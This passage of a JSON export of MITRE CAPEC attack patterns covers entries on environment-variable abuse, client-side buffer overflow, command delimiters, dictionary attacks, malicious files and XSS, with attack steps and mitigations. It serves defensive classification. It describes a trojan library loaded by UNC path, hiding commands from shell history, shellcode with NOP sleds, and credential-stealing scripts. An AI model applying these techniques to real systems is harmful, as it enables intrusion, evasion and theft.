Activities"}]},"Mitigations":{"Mitigation":["Protect environment variables against unauthorized read and write access.","Protect the configuration files which contain environment variables against illegitimate read and write access.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system.","Apply the least privilege principles. If a process has no legitimate reason to read an environment variable do not give that privilege."]},"Example_Instances":{"Example":["Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This requires that the attacker upload the Trojan library to a specific location on the target. As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\\\\\\\172.16.2.100\\\\shared_files\\\\trojan_dll.dll. See also: Path Manipulation (CVE-1999-0073)","The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \\"ignorespace\\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \\"ignoredups\\". In some Linux systems, this is set by default to \\"ignoreboth\\" which covers both of the previous examples. This means that \\" ls\\" will not be saved, but \\"ls\\" would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"353"},{"CWE_ID":"285"},{"CWE_ID":"302"},{"CWE_ID":"74"},{"CWE_ID":"15"},{"CWE_ID":"73"},{"CWE_ID":"20"},{"CWE_ID":"200"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1562.003","Entry_Name":"Impair Defenses:Impair Command History Logging"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.006","Entry_Name":"Hijack Execution Flow:Dynamic Linker Hijacking"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.007","Entry_Name":"Hijack Execution Flow:Path Interception by PATH Environment Variable"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"14":{"ID":"14","Name":"Client-side Injection-induced Buffer Overflow","Abstraction":"Detailed","Status":"Draft","Description":"This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service. This hostile service is created to deliver the correct content to the client software. For example, if the client-side application is a browser, the service will host a webpage that the browser loads.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target client-side application] The adversary identifies a target client-side application to perform the buffer overflow on. The most common are browsers. If there is a known browser vulnerability an adversary could target that."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":["Many times client side applications will be open source, so an adversary can examine the source code to identify possible injection vectors.","Examine APIs of the client-side application and look for areas where a buffer overflow might be possible."]},{"Step":"3","Phase":"Experiment","Description":"[Create hostile service] The adversary creates a hostile service that will deliver content to the client-side application. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["If the client-side application is a browser, the adversary will create a service that delivers a malicious webpage to the browser.","Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary delivers the content to the client-side application using the hostile service and overflows the buffer.","Technique":["If the adversary is targeting a local client-side application, they just need to use the service themselves.","If the adversary is attempting to cause an overflow on an external user\'s client-side application, they must get the user to attach to their service by some other means. This could be getting a user to visit their hostile webpage to target a user\'s browser."]}]},"Prerequisites":{"Prerequisite":["The targeted client software communicates with an external server.","The targeted client software has a buffer overflow vulnerability."]},"Skills_Required":{"Skill":["To achieve a denial of service, an attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap requires a more in-depth knowledge and higher skill level.",{"Level":"High"}]},"Indicators":{"Indicator":"An example of indicator is when the client software crashes after executing code downloaded from a hostile server."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["The client software should not install untrusted code from a non-authenticated server.","The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers.","Perform input validation for length of buffer inputs.","Use a language or compiler that performs automatic bounds checking.","Use an abstraction library to abstract away risky APIs. Not a complete solution.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Ensure all buffer uses are consistently bounds-checked.","Use OS-level preventative functionality. Not a complete solution."]},"Example_Instances":{"Example":{"div":["Attack Example: Buffer Overflow in Internet Explorer 4.0 Via EMBED Tag",{"style":"color:#32498D; font-weight:bold;"},"",{"style":"margin-left:10px;","class":"informative"}],"p":["Authors often use tags in HTML documents. For example","If an attacker supplies an overly long path in the SRC= directive, the mshtml.dll component will suffer a buffer overflow. This is a standard example of content in a Web page being directed to exploit a faulty module in the system. There are potentially thousands of different ways data can propagate into a given system, thus these kinds of attacks will continue to be found in the wild."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"353"},{"CWE_ID":"118"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"15":{"ID":"15","Name":"Command Delimiters","Abstraction":"Standard","Status":"Draft","Description":"An attack of this type exploits a programs\' vulnerabilities that allows an attacker\'s commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"137","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Assess Target Runtime Environment] In situations where the runtime environment is not implicitly known, the attacker makes connections to the target system and tries to determine the system\'s runtime environment. Knowing the environment is vital to choosing the correct delimiters.","Technique":["Port mapping using network connection-based software (e.g., nmap, nessus, etc.)","Port mapping by exploring the operating system (netstat, sockstat, etc.)","TCP/IP Fingerprinting","Induce errors to find informative error messages"]},{"Step":"2","Phase":"Explore","Description":"[Survey the Application] The attacker surveys the target application, possibly as a valid and authenticated user","Technique":["Spidering web sites for all available links","Inventory all application inputs"]},{"Step":"3","Phase":"Experiment","Description":"[Attempt delimiters in inputs] The attacker systematically attempts variations of delimiters on known inputs, observing the application\'s response each time.","Technique":["Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)","Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)","Enter command delimiters directly in input fields."]},{"Step":"4","Phase":"Exploit","Description":"[Use malicious command delimiters] The attacker uses combinations of payload and carefully placed command delimiters to attack the software."}]},"Prerequisites":{"Prerequisite":"Software\'s input validation or filtering must not detect and block presence of additional malicious command."},"Skills_Required":{"Skill":["The attacker has to identify injection vector, identify the specific commands, and optionally collect the output, i.e. from an interactive session.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Perform allowlist validation against a positive specification for command length, type, and parameters.","Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account","Implementation: Perform input validation for all remote content.","Implementation: Use type conversions such as JDBC prepared statements."]},"Example_Instances":{"Example":{"p":["By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target\'s inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior.","LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"146"},{"CWE_ID":"77"},{"CWE_ID":"184"},{"CWE_ID":"78"},{"CWE_ID":"185"},{"CWE_ID":"93"},{"CWE_ID":"140"},{"CWE_ID":"157"},{"CWE_ID":"138"},{"CWE_ID":"154"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"16":{"ID":"16","Name":"Dictionary-based Password Attack","Abstraction":"Detailed","Status":"Draft","Description":{"p":["An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user\'s account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.","Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don\'t care about inducing account lockouts."]},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"49"},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine application\'s/system\'s password policy] Determine the password policies of the target application/system.","Technique":["Determine minimum and maximum allowed password lengths.","Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).","Determine account lockout policy (a strict account lockout policy will prevent brute force attacks)."]},{"Step":"2","Phase":"Explore","Description":"[Select dictionaries] Pick the dictionaries to be used in the attack (e.g. different languages, specific terminology, etc.)","Technique":["Select dictionary based on particular users\' preferred languages.","Select dictionary based on the application/system\'s supported languages."]},{"Step":"3","Phase":"Explore","Description":"[Determine username(s) to target] Determine username(s) whose passwords to crack.","Technique":["Obtain username(s) by sniffing network packets.","Obtain username(s) by querying application/system (e.g. if upon a failed login attempt, the system indicates whether the entered username was valid or not)","Obtain usernames from filesystem (e.g. list of directories in C:\\\\Documents and Settings\\\\ in Windows, and list in /etc/passwd in UNIX-like systems)"]},{"Step":"4","Phase":"Exploit","Description":"[Use dictionary to crack passwords.] Use a password cracking tool that will leverage the dictionary to feed passwords to the system and see if they work.","Technique":["Try all words in the dictionary, as well as common misspellings of the words as passwords for the chosen username(s).","Try common combinations of words in the dictionary, as well as common misspellings of the combinations as passwords for the chosen username(s)."]}]},"Prerequisites":{"Prerequisite":["The system uses one factor password based authentication.","The system does not have a sound password policy that is being enforced.","The system does not implement an effective password throttling mechanism."]},"Skills_Required":{"Skill":["A variety of password cracking tools and dictionaries are available to launch this type of an attack.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A machine with sufficient resources for the job (e.g. CPU, RAM, HD). Applicable dictionaries are required. Also a password cracking tool or a custom script that leverages the dictionary database to launch the attack."},"Indicators":{"Indicator":"Many invalid login attempts are coming from the same machine (same IP address) or for the same log in name. The login attempts use passwords that are dictionary words."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Create a strong password policy and ensure that your system enforces this policy.","Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.","Leverage multi-factor authentication for all authentication services."]},"Example_Instances":{"Example":["A system user selects the word \\"treacherous\\" as their passwords believing that it would be very difficult to guess. The password-based dictionary attack is used to crack this password and gain access to the account.",{"p":["The Cisco LEAP challenge/response authentication mechanism uses passwords in a way that is susceptible to dictionary attacks, which makes it easier for remote attackers to gain privileges via brute force password guessing attacks.","Cisco LEAP is a mutual authentication algorithm that supports dynamic derivation of session keys. With Cisco LEAP, mutual authentication relies on a shared secret, the user\'s logon password (which is known by the client and the network), and is used to respond to challenges between the user and the Remote Authentication Dial-In User Service (RADIUS) server.","Methods exist for someone to write a tool to launch an offline dictionary attack on password-based authentications that leverage Microsoft MS-CHAP, such as Cisco LEAP. The tool leverages large password lists to efficiently launch offline dictionary attacks against LEAP user accounts, collected through passive sniffing or active techniques."]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"521"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Description, Mitigations, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"17":{"ID":"17","Name":"Using Malicious Files","Abstraction":"Standard","Status":"Draft","Description":"An attack of this type exploits a system\'s configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"122"},{"Nature":"CanPrecede","CAPEC_ID":"233"}]},"Prerequisites":{"Prerequisite":"System\'s configuration must allow an attacker to directly access executable files or upload files to execute. This means that any access control system that is supposed to mediate communications between the subject and the object is set incorrectly or assumes a benign environment."},"Skills_Required":{"Skill":["To identify and execute against an over-privileged system interface",{"Level":"Low"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.","Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables."]},"Example_Instances":{"Example":{"p":["Consider a directory on a web server with the following permissions","This could allow an attacker to both execute and upload and execute programs\' on the web server. This one vulnerability can be exploited by a threat to probe the system and identify additional vulnerabilities to exploit."],"div":["drwxrwxrwx 5 admin public 170 Nov 17 01:08 webroot",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"732"},{"CWE_ID":"285"},{"CWE_ID":"272"},{"CWE_ID":"59"},{"CWE_ID":"282"},{"CWE_ID":"270"},{"CWE_ID":"693"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.010","Entry_Name":"Hijack Execution Flow:Services File Permissions Weakness"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Accessing, Modifying or Executing Executable Files",{"Date":"2018-07-31"}]}},"18":{"ID":"18","Name":"XSS Targeting Non-Script Elements","Abstraction":"Detailed","Status":"Draft","Description":"This attack is a form of Cross-Site Scripting (XSS) where malicious scripts are embedded in elements that are not expected to host scripts such as image tags (), comments in XML documents (< !-CDATA->), etc. These tags may not be subject to the same input validation, output validation, and other content filtering and checking routines, so this can create an opportunity for an attacker to tunnel through the application\'s elements and launch a XSS attack through other elements. As with all remote attacks, it is important to differentiate the ability to launch an attack (such as probing an internal network for unpatched servers) and the ability of the remote attacker to collect and interpret the output of said attack.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using a browser or an automated tool, an attacker records all entry points for inputs that happen to be reflected in a client-side non-script element. These non-script elements can be located in the HTML content (head, body, comments), in an HTML tag, XML, CSS, etc.","Technique":["Use a spidering tool to follow and record all non-static links that are likely to have input parameters (through forms, URL, fragments, etc.) actively used by the Web application.","Use a proxy tool to record all links visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Probe identified potential entry points for XSS vulnerability] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.","Technique":["Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed. Since these probes may have to be injected in many different types of non-script elements, they should cover a variety of possible contexts (CSS, HTML tag, XML, etc.).","Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed. Since these probes may have to be injected in many different types of non-script elements, they should cover a variety of possible contexts (CSS, HTML tag, XML, etc.).","Use a proxy tool to record results of the created requests."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"The target client software must allow the execution of scripts generated by remote hosts."},"Skills_Required":{"Skill":["To achieve a redirection and use of less trusted source, an adversary can simply edit content such as XML payload or HTML files that are sent to client machine.",{"Level":"Low"},"Exploiting a client side vulnerability to inject malicious scripts into the browser\'s executable process.",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to include malicious script in document, e.g. HTML file, or XML document. Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["In addition to the traditional input fields, all other user controllable inputs, such as image tags within messages or the likes, must also be subjected to input validation. Such validation should ensure that content that can be potentially interpreted as script by the browser is appropriately filtered.","All output displayed to clients must be properly escaped. Escaping ensures that the browser interprets special scripting characters literally and not as script to be executed."]},"Example_Instances":{"Example":{"p":["An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. A malicious user embeds JavaScript in the IMG tags in their messages that gets executed within the victim\'s browser whenever the victim reads these messages.","When executed within the victim\'s browser, the malicious script could accomplish a number of adversary objectives including stealing sensitive information such as usernames, passwords, or cookies."],"div":["",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"80"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Examples-Instances, Related_Attack_Patterns, Related_Vulnerabilities, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"}],"Previous_Entry_Name":["Embedding Scripts in Non-Script Elements",{"Date":"2017-05-01"}]}},"19":{"ID":"19","Name":"Embedding Scripts within Scripts","Abstraction":"Standard","Status":"Stable","Description":"An attack of this type exploits a programs\' vulnerabilities that are brought on by allowing remote hosts to execute scripts. The adversary leverages this capability to execute their own script by embedding it within other scripts that the target software is likely to execute. The adversary must have the ability to inject their script into a script that is likely to be executed. If this is done, then the adversary can potentially launch a variety of probes and attacks against the web server\'s local environment, in many cases the so-called DMZ, back end resources the web server can communicate with, and other hosts. With the proliferation of intermediaries, such as Web App Firewalls, network devices, and even printers having JVMs and Web servers, there are many locales where an attacker can inject malicious scripts. Since this attack pattern defines scripts within scripts, there are likely privileges to execute said attack on the host. These attacks are not solely limited to the server side, client side scripts like Ajax and client side JavaScript can contain malicious scripts as well.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"242"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using a browser or an automated tool, an attacker records all entry points for inputs that happen to be reflected in a client-side script element. These script elements can be located in the HTML content (head, body, comments), in an HTML tag, XML, CSS, etc.","Technique":["Use a spidering tool to follow and record all non-static links that are likely to have input parameters (through forms, URL, fragments, etc.) actively used by the Web application.","Use a proxy tool to record all links visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Probe identified potential entry points for XSS vulnerability] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.","Technique":["Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side script elements context and observe system behavior to determine if script was executed.","Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a server-side script elements context and observe system behavior to determine if script was executed.","Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side script elements context and observe system behavior to determine if script was executed.","Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a server-side script elements context and observe system behavior to determine if script was executed.","Use a proxy tool to record results of the created requests."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target software must be able to execute scripts, and also grant the adversary 